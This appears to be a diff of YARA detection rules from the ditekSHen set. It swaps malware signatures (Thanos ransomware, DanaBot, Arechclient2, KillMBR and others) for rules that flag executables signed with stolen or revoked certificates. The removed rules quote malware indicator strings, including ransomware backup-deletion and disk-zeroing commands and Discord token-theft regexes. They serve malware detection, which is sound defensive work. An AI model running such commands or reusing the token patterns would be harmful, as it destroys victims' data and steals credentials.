-rule DITEKSHEN_MALWARE_Win_Dllloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Ca5Acafb5Fdca6F8B5D66D1339A5D85 : FILE
 {
 	meta:
-		description = "Detects unknown DLL Loader"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "164967b8-d0f5-543d-82ac-bb2465b85c2a"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "6f0e9e3a-52fc-5ffd-90b3-743d925388df"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4228-L4239"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7267-L7279"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "aaf1ff0f93d1fe6cf189c9f30403c226e64146178150dff8dfd3a9e3ed84bcc2"
+		logic_hash = "2612e58b4e1a6fa65b32fe855b3542882c79345e93ab134933c893e90bb1a75c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "LondLibruryA" fullword ascii
-		$s2 = "LdrLoadDll" fullword ascii
-		$s3 = "snxhk.dll" fullword ascii
-		$s4 = "DisableThreadLibraryCalls" fullword ascii
+		thumbprint = "ab25053a3f739ddd4505cf5d9d33b5cc50f3ab35"
+		hash1 = "a3ab41d9642a5a5aa6aa4fc1e316970e06fa26c6c545dd8ff56f82f41465ec08"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Valve" and pe.signatures [ i ] . serial == "0c:a5:ac:af:b5:fd:ca:6f:8b:5d:66:d1:33:9a:5d:85" )
 }
-rule DITEKSHEN_MALWARE_Win_Farfli : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_387Eeb89B8Bf626Bbf4C7C9F5B998B40 : FILE
 {
 	meta:
-		description = "Detects Farfli backdoor"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4c3c86f4-5493-5e8a-9618-b0c3d55e2b86"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "56dfc1b5-3aba-5c21-93e6-85d41a2a4415"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4241-L4253"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7281-L7293"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cb1856b32c66d6d070b8ec2d9feea25d6d6748057ceaa342be2ddc589f9a89d6"
+		logic_hash = "3436b7954e5488614f8f0998fe9eae7773d821c776436836d7b2230cd9c97f46"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "%ProgramFiles%\\Google\\" fullword ascii
-		$s2 = "%s\\%d.bak" fullword ascii
-		$s3 = "%s Win7" fullword ascii
-		$s4 = "%s:%d:%s" fullword ascii
-		$s5 = "C:\\2.txt" fullword ascii
+		thumbprint = "e94ad249747fd4b88750b2cd6d8d65ad33d3566d"
+		hash1 = "004f011b37e4446fa04b76aae537cc00f6588c0705839152ae2d8a837ef2b730"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ULTRA ACADEMY LTD" and pe.signatures [ i ] . serial == "38:7e:eb:89:b8:bf:62:6b:bf:4c:7c:9f:5b:99:8b:40" )
 }
-rule DITEKSHEN_MALWARE_Win_Warezov : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_035B41766660B08Aaf121536F0D83D4D : FILE
 {
 	meta:
-		description = "Detects Warezov worm/downloader"
+		description = "Detects signed excutable of DiskCryptor open encryption solution that offers encryption of all disk partitions"
 		author = "ditekSHen"
-		id = "8cb1dcb1-981d-5ff2-b0d9-aa18dfbfc795"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "80c803e1-16b8-583d-9d4f-3a0f693c9e24"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4255-L4269"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7295-L7306"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e65922902fd18175a3ce7b600d46535e92b92240fa3ca83dced6f9ce14f3e815"
+		logic_hash = "924ed1d3c6a8d378471a2e5301f3a813ee8622135ce001d3061918d9454cdcc4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "ft\\Windows\\CurrentVersion\\Run" wide
-		$s2 = "DIR%SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$s3 = "%WINDIR%\\sqhos32.wmf" wide
-		$s4 = "Accept: */*" fullword ascii
-		$s5 = "Range: bytes=" fullword ascii
-		$s6 = "module.exe" fullword ascii
-		$s7 = { 25 73 25 73 2e 25 73 ?? ?? 22 22 26 6c 79 79 56 00 00 00 00 25 73 25 30 34 64 25 30 32 64 25 30 32 64 00 }
+		thumbprint = "2022d012c23840314f5eeaa298216bec06035787"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Alexander Lomachevsky" and pe.signatures [ i ] . serial == "03:5b:41:76:66:60:b0:8a:af:12:15:36:f0:d8:3d:4d" )
 }
-rule DITEKSHEN_MALWARE_Win_Arechclient2 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1A041Db92237C18948109789F627B3Cd : FILE
 {
 	meta:
-		description = "Detects Arechclient2 RAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c12858ea-5e06-5303-9df0-0f59ba83b5e5"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "0a5a6b19-0fbe-5e0c-bfb1-ca201207f6c7"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4271-L4303"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7308-L7320"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0d841f4d4664fb09801c51f7b65e897e4e698753ad67fc20e2b81d98c0b3d07d"
+		logic_hash = "f5e07eb58a68dea062522869c43daeddab666f12b078a4f2ce9aa37885e46cbd"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\Google\\Chrome\\User Data\\copiedProf\"" wide
-		$s2 = "\",\"BotName\":\"" wide
-		$s3 = "\",\"BotOS\":\"" wide
-		$s4 = "\",\"URLData\":\"" wide
-		$s5 = "{\"Type\":\"ConnectionType\",\"ConnectionType\":\"Client\",\"SessionID\":\"" wide
-		$s6 = "{\"Type\":\"TestURLDump\",\"SessionID\":\"" wide
-		$s7 = "<ReceiveParticipantList>" ascii
-		$s8 = "<potocSkr>" ascii
-		$s9 = "fuck_sd" fullword ascii
-		$s10 = "HandleBotKiller" fullword ascii
-		$s11 = "RunBotKiller" fullword ascii
-		$s12 = "ConnectToServer" fullword ascii
-		$s13 = "KillBrowsers" fullword ascii
-		$s14 = "keybd_event" fullword ascii
-		$s15 = "FuckCodeImg" fullword ascii
-		$v1_1 = "grabber@" fullword ascii
-		$v1_2 = "<BrowserProfile>k__" ascii
-		$v1_3 = "<SystemHardwares>k__" ascii
-		$v1_4 = "<geoplugin_request>k__" ascii
-		$v1_5 = "<ScannedWallets>k__" ascii
-		$v1_6 = "<DicrFiles>k__" ascii
-		$v1_7 = "<MessageClientFiles>k__" ascii
-		$v1_8 = /<Scan(Browsers|Wallets|Screen|VPN)>k__BackingField/ fullword ascii
-		$v1_9 = "displayName[AString-ZaString-z\\d]{2String4}\\.[String\\w-]{String6}\\.[\\wString-]{2String7}Local Extension Settingshost" wide
-		$v1_10 = "\\sitemanager.xml MB or SELECT * FROM Cookiesconfig" wide
+		thumbprint = "2315cf802aaf96d11f18766315239016e533bf32"
+		hash1 = "a0338becbfe808bc7655d8b6c825e2e99b37945e5d8fc43a83aec479d64f422d"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 7 of ( $v1* ) or ( 6 of ( $v1* ) and 1 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Amitotic" and pe.signatures [ i ] . serial == "1a:04:1d:b9:22:37:c1:89:48:10:97:89:f6:27:b3:cd" )
 }
-rule DITEKSHEN_MALWARE_Win_Killmbr : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_06Df5C318759D6Ea9D090Bfb2Faf1D94 : FILE
 {
 	meta:
-		description = "Detects KillMBR"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b109865f-e268-5633-bb8e-f390dd050d99"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "8c1f226f-6fc0-5136-ac19-7d88d7505a8e"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4305-L4316"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7322-L7334"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1ed9206f90052df7e533be4612afa373e5e69fba8f5b5ae4df1c09a9d98958cf"
+		logic_hash = "3be08901a44c1c94cfb93e56075270ed974399ccc0a4dce15299456dad645822"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\\\.\\PhysicalDrive" ascii
-		$s2 = "/logger.php" ascii
-		$s3 = "Ooops! Your MBR was been rewritten" ascii
-		$s4 = "No, this ransomware dont encrypt your files, erases it" ascii
+		thumbprint = "4418e9a7aab0909fa611985804416b1aaf41e175"
+		hash1 = "47dbb2594cd5eb7015ef08b7fb803cd5adc1a1fbe4849dc847c0940f1ccace35"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of them and #s1 > 10 )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SpiffyTech Inc." and pe.signatures [ i ] . serial == "06:df:5c:31:87:59:d6:ea:9d:09:0b:fb:2f:af:1d:94" )
 }
-rule DITEKSHEN_MALWARE_Win_Lcpdot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_330000026551Ae1Bbd005Cbfbd000000000265 : FILE
 {
 	meta:
-		description = "Detects LCPDot"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e4db3784-7fb0-58bd-997e-788f409445cd"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "7f86e427-110f-5bcc-bb53-ca534f7444fc"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4318-L4337"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7337-L7351"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b0f77f17976c38a69c2ff0d84002f2db29a4d25873309259519115b5f2b210ff"
+		logic_hash = "ae836069665d088c6a309efe5166e260836dce6398c51701b2274515bdaa2cbd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword wide
-		$s2 = "Cookie: SESSID=%s" fullword ascii
-		$s3 = "Cookie=Enable" fullword ascii
-		$s4 = "Cookie=Enable&CookieV=%d&Cookie_Time=32" fullword ascii
-		$s5 = ".?AVTShellCodeRuner@@" fullword ascii
-		$s6 = ".?AVTHashEncDecoder@@" fullword ascii
-		$s7 = ".?AVTWebAddressList@@" fullword ascii
-		$s8 = "WinMain.dll" fullword ascii
-		$s9 = "HotPlugin" wide
-		$o0 = { 4c 89 6c 24 08 4c 89 34 24 44 8d 77 01 44 8d 6f }
-		$o1 = { 8b f0 e8 58 34 00 00 48 8b f8 48 85 c0 74 0c 48 }
-		$o2 = { c7 44 24 30 47 49 46 38 c7 44 24 34 39 61 27 00 }
+		thumbprint = "e168609353f30ff2373157b4eb8cd519d07a2bff"
+		hash1 = "a471fdf6b137a6035b2a2746703cd696089940698fd533860d34e71cc6586850"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of ( $s* ) or ( all of ( $o* ) and 3 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Windows" and pe.signatures [ i ] . issuer contains "Microsoft Windows Production PCA 2011" and pe.signatures [ i ] . serial == "33:00:00:02:65:51:ae:1b:bd:00:5c:bf:bd:00:00:00:00:02:65" and 1614796238 <= pe.signatures [ i ] . not_after )
 }
-rule DITEKSHEN_MALWARE_Win_Torisma : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_309368B122Ab63103Dddd4Ad6321A82C : FILE
 {
 	meta:
-		description = "Detects Torisma"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e62a0f1c-4404-5da1-9c43-4cb58e735827"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "a9c2fa86-506e-503a-a864-8368f63662c4"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4339-L4355"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7353-L7365"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bd3823f8a91fdfc443e20bcb299a5103b7176a694f0d5328e7986de83f677a31"
+		logic_hash = "37a39d63e2bce6d4ce501e3032ee12fe8c5b39e8d8cb0f3e0c6d0be375bcffc8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "ACTION=PREVPAGE&CODE=C%s&RES=%d" fullword ascii
-		$s2 = "ACTION=VIEW&PAGE=%s&CODE=%s&CACHE=%s&REQUEST=%d" fullword ascii
-		$s3 = "ACTION=NEXTPAGE&CODE=S%s&CACHE=%s&RES=%d" fullword ascii
-		$s4 = "Your request has been accepted. ClientID: {" ascii
-		$s5 = "Proxy-Connection: Keep-Alive" fullword wide
-		$s6 = "Content-Length: %d" fullword wide
-		$o0 = { f7 f9 8b c2 89 44 24 34 48 63 44 24 34 48 8b 4c }
-		$o1 = { 48 c7 00 ff ff ff ff 48 8b 84 24 90 }
-		$o2 = { f3 aa 83 7c 24 30 01 75 34 c7 44 24 20 01 }
+		thumbprint = "1370de077e2ba2065478dee8075b16c0e5a5e862"
+		hash1 = "b7376049b73feb5bc677a02e4040f2ec7e7302456db9eac35c71072dd95557eb"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) or ( all of ( $o* ) and 3 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Systems Accounting Limited" and pe.signatures [ i ] . serial == "30:93:68:b1:22:ab:63:10:3d:dd:d4:ad:63:21:a8:2c" )
 }
-rule DITEKSHEN_MALWARE_Win_Thanos : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_19F613Cf951D49814250701037442Ee2 : FILE
 {
 	meta:
-		description = "Detects Thanos / Prometheus / Spook ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f523906e-ef5e-57be-82ed-06e75c393f42"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "780c515e-811c-5f44-97a2-9ed93a7d9d89"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4357-L4389"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7367-L7384"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8ce7cdfe4bca31e21d6fa31a75c46737a41fae3b5b0fda818e3a4709ceaf9bf5"
+		logic_hash = "1ea5f770ddbb7dba836049bec0c7b73cd5bc6a87514f8ea00288cb9d52d17651"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$f1 = "<WorkerCrypter2>b__" ascii
-		$f2 = "<Encrypt2>b__" ascii
-		$f3 = "<Killproc>b__" ascii
-		$f4 = "<GetIPInfo>b__" ascii
-		$f5 = "<MacAddress>k__" ascii
-		$f6 = "<IPAddress>k__" ascii
-		$f7 = "<Crypt>b__" ascii
-		$s1 = "Aditional KeyId:" wide
-		$s2 = "process call create cmd.exe /c \\\\" wide
-		$s3 = "/c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin" wide
-		$s4 = "\\HOW_TO_DECYPHER_FILES." wide
-		$s5 = "Client Unique Identifier Key:" wide
-		$s6 = "/s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.win c:\\*.dsk" fullword wide
-		$s7 = "NtOpenProcess" fullword wide
-		$s8 = "Builder_Log" fullword wide
-		$s9 = "> Nul & fsutil file setZeroData offset=0 length=" wide
-		$s10 = "3747bdbf-0ef0-42d8-9234-70d68801f407" wide
-		$s11 = "4b195894-0f06-4fdd-afb4-b17fb9246a59" wide
-		$s12 = "cec564ff-2433-4771-b918-15f58ef6e26c" wide
-		$s13 = "56258a19-7489-468b-86ee-e7899203d67c" wide
-		$s14 = "WalkDirectoryTree" fullword ascii
-		$s15 = "hashtableLock" fullword ascii
-		$s16 = "get_ParentFrn" fullword ascii
-		$m1 = "SW5mb3JtYXRpb24uLi" wide
-		$m2 = "QWxsIHlvdXIgZmlsZXMgd2VyZSBlbmNyeXB0" wide
+		thumbprint1 = "6feab07fa782fc7fbddde8465815f4d04d79ad97"
+		thumbprint2 = "41aaafa56a30badb291e96d31ed15a9343ba7ed3"
+		hash1 = "9629cae6d009dadc60e49f5b4a492bd1169d93f17afa76bee27c37be5bca3015"
+		hash2 = "3b3281feef6d8e0eda2ab7232bd93f7c747bee143c2dfce15d23a1869bf0eddf"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $f* ) or 5 of ( $s* ) or ( 4 of ( $f* ) and 2 of ( $s* ) or ( all of ( $m* ) and 3 of them ) ) or 8 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cooler Master" and ( pe.signatures [ i ] . serial == "19:f6:13:cf:95:1d:49:81:42:50:70:10:37:44:2e:e2" or pe.signatures [ i ] . serial == "6b:e8:ee:f0:82:a4:f5:96:4c:75:0b:c0:07:24:f6:4a" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Tmanager : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2D8Cfcf04209Dc7F771D8D18E462C35A : FILE
 {
 	meta:
-		description = "Detects TManager RAT. Associated with TA428"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "391b72bd-ddf5-5251-b566-c75c1cc16b74"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "6b2b25af-dae5-5055-851d-e515f6beee58"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4391-L4410"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7386-L7398"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cdbcc00ae67c9161f6db89cfa658c8bc8fb7fab3915ac5ae99bdd34c42ee2abb"
+		logic_hash = "e7eee6a6593c231c193145eeefd03a0f32c1d8cc103c97cfa26b5af7363c9b08"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "WSAStartup Error!" fullword wide
-		$s2 = "KB3112342.LOG" fullword wide
-		$s3 = "\\cmd.exe -c" fullword wide
-		$s4 = "sock_hmutex" fullword wide
-		$s5 = "cmd_hmutex" fullword wide
-		$s6 = "powershell" fullword wide
-		$s7 = "%s_%d.bmp" fullword wide
-		$s8 = "!Error!" fullword wide
-		$s9 = "[Execute]" fullword ascii
-		$s10 = "[Snapshot]" fullword ascii
-		$s11 = "GetLanIP error!" fullword ascii
-		$s12 = "chcp & exit" fullword ascii
+		thumbprint = "a9c61e299634ba01e269239de322fb85e2da006b"
+		hash1 = "af27173ed576215bb06dab3a1526992ee1f8bd358a92d63ad0cfbc0325c70acf"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AA PLUS INVEST d.o.o." and pe.signatures [ i ] . serial == "2d:8c:fc:f0:42:09:dc:7f:77:1d:8d:18:e4:62:c3:5a" )
 }
-rule DITEKSHEN_MALWARE_Win_Sn0Wlogger : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_06De439Ba2Df4Dcd8240C211D60Cdf5E : FILE
 {
 	meta:
-		description = "Detects Sn0w Logger"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cdb70164-3f72-553f-a6c5-190f699e0743"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "90623074-58ac-51fd-9b80-881d3187dc74"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4412-L4428"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7400-L7412"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ea4b2281f906271dc249b5036b22eadfc5add94def4f8e4f8a40c384618465d8"
+		logic_hash = "a2847853e2e9cc9e6909871b3f8e6de399fb76353e997b084c92dbcfe6c1a48f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\SnowP\\Example\\Secured\\" ascii
-		$s2 = "{0}{3}Content-Type: {4}{3}Content-Disposition: form-data; name=\"{1}\"{3}{3}{2}{3}" wide
-		$s3 = "\"encrypted_key\":\"(.*?)\"" fullword wide
-		$s4 = "<SendToDiscord>d__" ascii
-		$s5 = "_urlWebhook" ascii
-		$r1 = "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}" fullword wide
-		$r2 = "^\\w+([-+.']\\w+)*@\\w+([-.]\\w+)*\\.\\w+([-.]\\w+)*$" fullword wide
-		$r3 = "mfa\\.[\\w-]{84}" fullword wide
-		$r4 = "(\\w+)=(\\d+)-(\\d+)$" fullword wide
+		thumbprint = "2650a1205bd7720381c00bdee5aede0ee333dc13"
+		hash1 = "e3bc81a59fc45dfdfcc57b0078437061cb8c3396e1d593fcf187e3cdf0373ed1"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( all of ( $r* ) and 2 of ( $s* ) ) or 7 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microleaves LTD" and pe.signatures [ i ] . serial == "06:de:43:9b:a2:df:4d:cd:82:40:c2:11:d6:0c:df:5e" )
 }
-rule DITEKSHEN_MALWARE_Win_Danabot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00F454F2Fdc800B3454059D8889Bd73D67 : FILE
 {
 	meta:
-		description = "Detects DanaBot variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a49e21b9-d40a-5273-a9a2-322a1ec9bbbc"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "277ac503-91c4-5266-b8a4-c01a48b8df4d"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4430-L4459"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7414-L7429"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8d037b46d719159dc3e60f0c7143022ce8745cfd753c3754ae80a220a838567d"
+		logic_hash = "91b33a3e915a007d00482905471e124045a373fef9c8b0fe9a987196d2ec013a"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "ms ie ftp passwords" fullword wide
-		$s2 = "CookieEntryEx_" fullword wide
-		$s3 = "winmgmts:\\\\localhost\\root\\cimv2" fullword wide
-		$s4 = "S-Password.txt" fullword wide
-		$s5 = "del_ini://Main|Password|" fullword wide
-		$s6 = "cmd.exe /c start chrome.exe --no-sandbox" wide
-		$s7 = "cmd.exe /c start firefox.exe -no-remote" wide
-		$s8 = "\\rundll32.exe shell32.dll,#" wide
-		$s9 = "S_Error:TORConnect" wide
-		$s10 = "InjectionProcess" fullword ascii
-		$s11 = "proxylogin" fullword wide
-		$s12 = "\\FS_Morff\\FS_Temp\\" wide
-		$ds1 = "C:\\Windows\\System32\\rundll32.exe" fullword wide
-		$ds2 = "PExtended4" fullword ascii
-		$ds3 = "%s-%s" fullword wide
-		$ds4 = "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F808182838485868788898A8B8C8D8E8F909192939495969798999A9B9C9D9E9FA0A1A2A3A4A5A6A7A8A9AAABACADAEAFB0B1B2B3B4B5B6B7B8B9BABBBCBDBEBFC0C1C2C3C4C5C6C7C8C9CACBCCCDCECFD0D1D2D3D4D5D6D7D8D9DADBDCDDDEDFE0E1E2E3E4E5E6E7E8E9EAEBECEDEEEFF0F1F2F3F4F5F6F7F8F9FAFBFCFDFEFF0123456789ABCDEF" fullword wide
+		thumbprint = "2b560fabc34e0db81dae1443b1c4929eef820266"
+		hash1 = "e58b80e4738dc03f5aa82d3a40a6d2ace0d7c7cfd651f1dd10df76d43d8c0eb3"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or all of ( $ds* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BEAUTY CORP SRL" and ( pe.signatures [ i ] . serial == "f4:54:f2:fd:c8:00:b3:45:40:59:d8:88:9b:d7:3d:67" or pe.signatures [ i ] . serial == "00:f4:54:f2:fd:c8:00:b3:45:40:59:d8:88:9b:d7:3d:67" ) )
 }
